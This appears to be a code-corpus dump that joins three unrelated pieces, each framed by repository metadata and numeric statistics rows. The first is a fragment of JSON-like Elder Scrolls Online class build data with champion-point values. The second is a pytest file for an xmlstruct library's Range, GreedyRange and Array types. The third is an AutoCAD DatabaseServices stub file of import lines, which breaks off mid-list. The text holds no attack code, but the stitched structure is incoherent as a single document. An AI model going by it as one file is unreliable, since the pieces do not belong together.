"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Sorcerer",
"names": ["magsorc", "magicka sorcerer"],
"builds": [
{
"name": "Magicka Sorcerer",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Dragonknight",
"names": ["magdk", "magicka dragonknight"],
"builds": [
{
"name": "Magicka Dragonknight",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Templar",
"names": ["magplar", "magicka templar"],
"builds": [
{
"name": "Magicka Templar",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Warden",
"names": ["magden", "magicka warden"],
"builds": [
{
"name": "Magicka Warden",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "61",
},
{
"name": "Spell Erosion",
"value": "1",
},
{
"name": "Master at Arms",
"value": "61",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Magicka Necromancer",
"names": ["magcro", "magicka necromancer", "magicka necro"],
"builds": [
{
"name": "Magicka Necromancer",
"blue": [
{
"name": "Elemental Expert",
"value": "64",
},
{
"name": "Elfborn",
"value": "56",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "9",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Stamina Nightblade",
"names": ["stamblade", "stamina nightblade"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Stamina Sorcerer",
"names": ["stamsorc", "stamina sorcerer"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "2H/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Stamina Dragonknight",
"names": ["stamdk", "stamina dragonknight"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "72",
},
{
"name": "Physical Weapon Expert",
"value": "2",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "66",
},
],
},
]
},
{
"display_name": "Stamina Templar",
"names": ["stamplar", "stamina templar"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
]
},
{
"display_name": "Stamina Warden",
"names": ["stamden", "stamina warden"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
]
},
{
"display_name": "Stamina Necromancer",
"names": ["stamcro", "stamina necromancer"],
"builds": [
{
"name": "Dual Wield/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "2H/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Precise Strikes",
"value": "81",
},
{
"name": "Thaumaturge",
"value": "44",
},
],
},
{
"name": "Bow/Bow",
"blue": [
{
"name": "Master at Arms",
"value": "81",
},
{
"name": "Physical Weapon Expert",
"value": "9",
},
{
"name": "Mighty",
"value": "64",
},
{
"name": "Piercing",
"value": "16",
},
{
"name": "Precise Strikes",
"value": "66",
},
{
"name": "Thaumaturge",
"value": "34",
},
],
},
]
},
{
"display_name": "Healer Nightblade",
"names": ["healblade", "healer nightblade"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Sorcerer",
"names": ["healsorc", "healer sorcerer"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Dragonknight",
"names": ["healdk", "healer dragonknight"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Templar",
"names": ["healplar", "healer templar"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Warden",
"names": ["healden", "healer warden"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
{
"display_name": "Healer Necromancer",
"names": ["healcro", "healer necromancer"],
"builds": [
{
"name": "Healing",
"blue": [
{
"name": "Blessed",
"value": "64",
},
{
"name": "Elemental Expert",
"value": "43",
},
{
"name": "Elfborn",
"value": "64",
},
{
"name": "Spell Erosion",
"value": "18",
},
{
"name": "Master at Arms",
"value": "28",
},
{
"name": "Staff Expert",
"value": "16",
},
{
"name": "Thaumaturge",
"value": "37",
},
],
},
{
"name": "Z'en/MK/RO",
"blue": [
{
"name": "Elemental Expert",
"value": "56",
},
{
"name": "Elfborn",
"value": "66",
},
{
"name": "Master at Arms",
"value": "66",
},
{
"name": "Staff Expert",
"value": "7",
},
{
"name": "Piercing",
"value": "3",
},
{
"name": "Thaumaturge",
"value": "72",
},
],
},
]
},
]
| 30.217117 | 68 | 0.18461 | 1,301 | 33,541 | 4.74558 | 0.059954 | 0.092647 | 0.068027 | 0.090703 | 0.852284 | 0.843052 | 0.843052 | 0.843052 | 0.833009 | 0.833009 | 0 | 0.036275 | 0.692615 | 33,541 | 1,109 | 69 | 30.244364 | 0.562561 | 0 | 0 | 0.476105 | 0 | 0 | 0.191706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f08a4604262c49caf7df1ac50105b39323914e4 | 2,510 | py | Python | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | 3 | 2017-03-21T22:48:44.000Z | 2017-03-22T20:42:18.000Z | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | null | null | null | tests/test_repeaters.py | matan1008/xmlstruct | a7b12c5daf5c4622a3d75e39c0c5f837e93e980a | [
"MIT"
] | null | null | null | # coding=utf-8
from xmlstruct import Int, Range, GreedyRange, Array
from xmlstruct.exceptions import RangeError
import pytest
def test_range_build():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1, 2, 3]
assert xml_range.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_range_parse():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1, 2, 3]
assert xml_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
def test_range_build_less():
xml_range = Range("test", 2, 4, Int("testint"))
obj = [1]
with pytest.raises(RangeError):
xml_range.build(obj)
def test_range_parse_less():
xml_range = Range("test", 2, 4, Int("testint"))
with pytest.raises(RangeError):
xml_range.parse(r"<test><testint>1</testint></test>")
def test_range_build_more():
xml_range = Range("test", 0, 2, Int("testint"))
obj = [1, 2, 3]
with pytest.raises(RangeError):
xml_range.build(obj)
def test_range_parse_more():
xml_range = Range("test", 0, 2, Int("testint"))
with pytest.raises(RangeError):
xml_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>")
def test_range_build_zero():
xml_range = Range("test", 0, 2, Int("testint"))
obj = []
assert xml_range.build(obj) in (r"<test></test>", "<test />")
def test_range_parse_zero():
xml_range = Range("test", 0, 2, Int("testint"))
obj = []
assert xml_range.parse(r"<test></test>") == obj
assert xml_range.parse("<test />") == obj
def test_greedy_range_build():
xml_greedy_range = GreedyRange("test", Int("testint"))
obj = [1, 2, 3]
assert xml_greedy_range.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_greedy_range_parse():
xml_greedy_range = GreedyRange("test", Int("testint"))
obj = [1, 2, 3]
assert xml_greedy_range.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
def test_array_build():
xml_array = Array("test", 3, Int("testint"))
obj = [1, 2, 3]
assert xml_array.build(obj) == r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>"
def test_array_parse():
xml_array = Array("test", 3, Int("testint"))
obj = [1, 2, 3]
assert xml_array.parse(r"<test><testint>1</testint><testint>2</testint><testint>3</testint></test>") == obj
| 31.375 | 118 | 0.64741 | 373 | 2,510 | 4.193029 | 0.091153 | 0.086957 | 0.08312 | 0.086957 | 0.86445 | 0.828645 | 0.803708 | 0.803708 | 0.803708 | 0.748721 | 0 | 0.029801 | 0.157769 | 2,510 | 79 | 119 | 31.772152 | 0.710028 | 0.004781 | 0 | 0.5 | 0 | 0.12963 | 0.28766 | 0.217949 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.222222 | false | 0 | 0.055556 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f41534d462a29b047a21f529edce627206b0a47 | 56,112 | py | Python | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | 1 | 2020-03-25T03:27:24.000Z | 2020-03-25T03:27:24.000Z | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | null | null | null | extensions/.stubs/clrclasses/Autodesk/AutoCAD/DatabaseServices/__init__.py | vicwjb/Pycad | 7391cd694b7a91ad9f9964ec95833c1081bc1f84 | [
"MIT"
] | null | null | null | import __clrclasses__.Autodesk.AutoCAD.DatabaseServices.Filters as Filters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AbstractViewTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AbstractViewTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ActionsToEvaluateCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AddObjectSnapInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AlignedDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AngleConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AngularConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotationScale
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AnnotativeStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ApplicationLoadReasons
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Arc
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ArcDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Assoc2dConstraintCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Assoc2dConstraintGroup
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocAction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArray
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayCommonParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayPathParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayPolarParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayRectangularParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocAsmBodyActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocBlendSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocCompoundActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocConstraintType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependencyBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependencyPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDimDependencyBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDimDependencyBodyBase
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDraggingState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeChamferActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeFilletActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationPriority
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocExtendSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocExtrudedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocFaceActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocFilletSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocGeomDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocGlobalUtility
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocLoftedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocNetwork
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocNetworkSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocObjectTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocOffsetSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocParamBasedActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPatchSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPathActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPathBasedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPersSubentityId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPersSubentityIdPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPlaneSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocRevolvedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSimplePersSubentId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSingleEdgePersSubentId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSweptSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocTransformationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocTrimSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocValueDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocValueProviderPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVariable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVariableCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVertexActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AuditInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AuditPass
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AutoConstrainEvaluationCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Background
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginInsertEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginInsertEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockBlockEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockBlockEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockEntireDatabaseEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockEntireDatabaseEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockObjectsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockObjectsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockSelectedObjectsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockSelectedObjectsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlendOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlendOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockBegin
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockConnectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockEnd
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockInsertionPointsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockInsertionPointsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableColumnCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableRow
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableRowCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockScaling
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTableRecordEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Body
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BooleanOperationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BulgeVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BulgeVertexCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CallerMustCloseAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Cell
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellAlignment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellBorder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellBorders
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellClass
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContent
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentLayout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentTypes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellEdgeMasks
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellMargins
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellRange
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CenterPointConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Circle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ClipBoundaryType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColinearConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CollisionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Column
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColumnsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColumnType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CompositeConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CompoundObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConcentricConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Constrained2PointsConstructionLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedArc
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedBoundedEllipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedBoundedLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedCircle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedConstructionLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedCurve
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedDatumLine
